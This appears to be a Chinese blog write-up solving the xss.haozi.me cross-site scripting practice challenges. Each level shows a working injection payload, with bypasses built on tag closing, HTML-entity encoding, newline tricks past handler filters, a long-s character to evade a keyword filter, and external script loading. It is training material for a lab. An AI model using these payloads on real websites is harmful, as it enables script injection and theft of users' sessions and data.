xss挑战

最新推荐文章于 2024-05-06 12:53:36 发布
最新推荐文章于 2024-05-06 12:53:36 发布
阅读量231 收藏 2
点赞数
分类专栏: 学习经历
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40871137/article/details/104213149
版权

xss挑战

https://xss.haozi.me GitHub的issues里有题解

0x00

<script>alert(1)</script>

0x01

闭合标签

</textarea><script>alert(1)</script>

0x02

"><script>alert(1)</script>

使得代码变成这样,将input标签闭合

<input type="name" value=""><script>alert(1)</script>">

0x03

过滤了括号,方法就挺多了。比如unicode编码绕过

<svg><script>alert&#40 1&#41 </script></svg>

0x04

过滤了括号和反引号(哈哈,看出来上题实际是想考什么了吧)。跟上题一样Unicode编码

<svg><script>alert&#40 1&#41 </script></svg>

0x05

闭合掉注释

--!><script>alert(1)</script>

0x06

input = input.replace(/auto|on.*=|>/ig, '_')

/ig 全文查找,忽略大小写

匹配auto或者on开头,=或者>结尾的字符串。中间的.匹配的是除了换行符n之外的字符串,所以可以用换行绕过

type="image" src="" onerror
="alert(1)"

0x07

过滤了<开头 >结尾的字符串

<img src="" onerror ="alert(1)"

0x08

标签会被替换,在e和>之间加空格或者换行就能绕过。有点奇妙

</style ><script>alert(1)</script>

0x09

含有指定url,然后想法闭合标签

https://www.segmentfault.com.haozi.me"></script><script>alert(1)</script>

0x0A

引入外部js文件(可惜没有域名,用ip地址没成功)

https://www.segmentfault.com@domain/a.js

0x0B&0x0C

老套路编码绕过

<img src="" onerror ="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;"

0x0D

function render (input) {
  input = input.replace(/[</"']/g, '')
  return `
    <script>
          // alert('${input}')
    </script>
  `
}

换行以跳出function中的单行注释,在用–>注释掉后面跟着的‘)

input:


alert(1)
-->

0x0E

  1. ſ 古英语中的s的写法, 转成大写是正常的S 2. 用外链的方式加载外部js 这题解就离谱。。。。
<ſcript src="https://www.segmentfault.com.haozi.me/j.js"></script>

0x0F

构造闭合,转义没起作用(对html inline js 转义就是做无用功,浏览器会先解析html, 然后再解析 js)

');alert('1

0x10

'';alert(1)

0x11

");alert("1

0x12

" 被转义成 " 经过html 解析后 里面变成 console.log("\")会报语法错误, 再补个 \ 即可

\");alert(1)//

或者新建一个标签

</script><script>alert(1)</script>
wuerror
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss挑战(超详细小白)
weixin_64655821的博客
09-22 1336
xss挑战前十关
xss实战-------要点记录
bylfsj的博客
09-13 894
1.htmlentities() 只对html标签做字符转化,对html里的英文字母不做转换,但是对汉字会做转换!------------乱码区别 2.htmlspecialchars() ‘单引号考虑未转义
XSS漏洞05】XSS通关大挑战
Fighting_hawk的博客
02-25 3985
1. 通过测试语句执行情况、网页源码: 1. 判断大小于号是否过滤与转义; 2. 判断单双引号是否过滤与转义; 3. 判断关键字是否过滤与转义; 4. 判断大小写是否转化; 5. 判断语句闭合方式。 6. 额外地,可以分析是否存在其他注入点。 2. 根据判断结果,灵活构造语句与利用绕过规则。...
XSS Challenges 靶场通关解析
最新发布
Flag少侠的博客
05-06 2049
XSS Challenges(跨站脚本攻击挑战)是一种用于学习和测试跨站脚本(XSS)漏洞的实验性平台。这些挑战旨在帮助安全研究人员和开发人员了解XSS漏洞的工作原理、检测方法和防御技巧。通常,XSS Challenges平台提供一系列不同级别和类型的XSS漏洞场景,参与者需要利用这些漏洞实现特定的攻击目标。这些挑战可以包括在网页输入框中注入恶意脚本、利用DOM(文档对象模型)漏洞执行JavaScript代码等。参与者需要通过分析和利用漏洞,成功地触发XSS漏洞并实现攻击目标,从而完成挑战
xsschallenge1~13通关详细教程
来日可期的博客
08-25 1823
xsschallenge通关详细教程
050 XSS通关小游戏——xss challenge
鸡蛋炒鸡蛋
03-05 5677
文章目录一:下载与部署二:通关过程首页level-01level-02level-03level-04level-05level-06level-07level-08level-09 一:下载与部署 xss challenge是个有关反射型xss的测试通关挑战,一共有20关。 下载地址:xss challenge (访问密码:donMkh) 下载之后解压,把得到的文件夹放在phpstudy的www文件夹下即可   二:通关过程 这个是我自己的通关方法,不一定很准确 首页 level-01 点击
xss闯关挑战
11-09
这个是XSS闯关文件,解压后放在服务器的对应文件夹即可。 闯关笔记我博客中有记录,新手可以参考。 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如...
Intigriti-XSS-challenge:这将包含有关intigriti xss挑战的解决方案和吸取的教训以及技巧和窍门
04-02
Intigriti XSS挑战是一个专门设计的练习平台,旨在帮助安全研究人员和爱好者提升在发现和利用XSS漏洞方面的技能。这个挑战提供了一系列的实际场景,让参与者通过解决这些问题来学习XSS攻击的各种形式和防御策略。 #...
【技术分享】Intigriti史上最难XSS挑战Writeup .pdf
09-05
【技术分享】Intigriti史上最难XSS挑战Writeup 这篇分享主要涉及的是一个名为Intigriti的网络安全平台发起的XSS(跨站脚本攻击)挑战,该挑战被官方誉为历史最难,吸引了全球众多黑客、CFTer(Capture The Flag参与...
xss-board:使用 Zombie.js 的简单 XSS 挑战示例
06-13
这是使用 Zombie.js ( ) 进行简单 XSS 挑战的示例。 机器人将每三分钟访问一次网站(取决于下面的 crontab 设置)并执行它找到的所有 Javascript 代码。 配置它 调整 cookie ('mag1c_c00k1e') 和标志 ('put_flag_...
ctf-browser-visitor:Bot访客服务,应对CTF中的XSS挑战
05-04
ctf浏览器访问者 Bot访问者应对CTF中的XSS挑战 http://127.0.0.1:5000/visit?job={"url":"url_to_visit","cookies":{"key":"value"}}
XSS挑战
贝隆的博客
02-05 324
XSS挑战
XSS 之 haozi me 题解——人生第一份CSDN题解
Mr_Fmnwon的博客
08-05 662
XSS 靶场:xss.haozi.me 认真写的第一篇WP,以此总结,以此自勉
XSS挑战之旅[全20关]上
ldkpolite007的博客
05-06 2568
Contents 0x01 0x02 0x03 0x04 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体验; 在创作中心设置你喜爱的代码高亮样式,Markdown 将代码片显示选择的高亮样式
靶场通关-XSS挑战之旅(1-5)
m0_56634355的博客
06-04 1398
直接使用在线靶场网址:https://xss.angelo.org.cn本地搭建xss靶场,这个简单百度吧点击图片后,进入下图:我们可以看到用于js弹窗的代码顺利执行了 看看源码,分析一下 接下来去服务器端看看这一关的源码......
XSS挑战平台
The Road Of Sec
01-24 2590
xss练习 项目:https://github.com/haozi/xss-demo 地址:https://xss.haozi.me 自带alert(1)的js地址:https://xss.haozi.me/j.js 题解: 0x00 没有丝毫的过滤措施,且最后的输出位置在标签中,所以很简单,随便甩一个xss payload function render (input) { return '...
XSS刷题之旅
Lethe's Blog
07-30 1580
0x01 一些资源或文章: XSS小结 那些年我们没能bypass的xss filter XSS Filter Evasion Cheat Sheet 中文版 XSS攻击手段&在CTF中的运用 0x02 常用Payload(慢慢积累…) <img src="x" onerror=alert(1)> <img src="1" onerror=eval("alert('xss...
xss绕过字符过滤_Xss小游戏通关秘籍
weixin_39758712的博客
12-01 496
原创: Kale 合天智汇原创投稿活动:https://link.zhihu.com/?target=https%3A//mp.weixin.qq.com/s/Nw2VDyvCpPt_GG5YKTQuUQ题记最近发现一个xss的攻防网站,界面很有意思,很适合寓教于乐。于是玩了一下午,特此记录下来!xss姿势众多,所以每关也只是给了一部分示例!知识前导什么是XSSXSS 或者说跨站脚本是一种 We...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值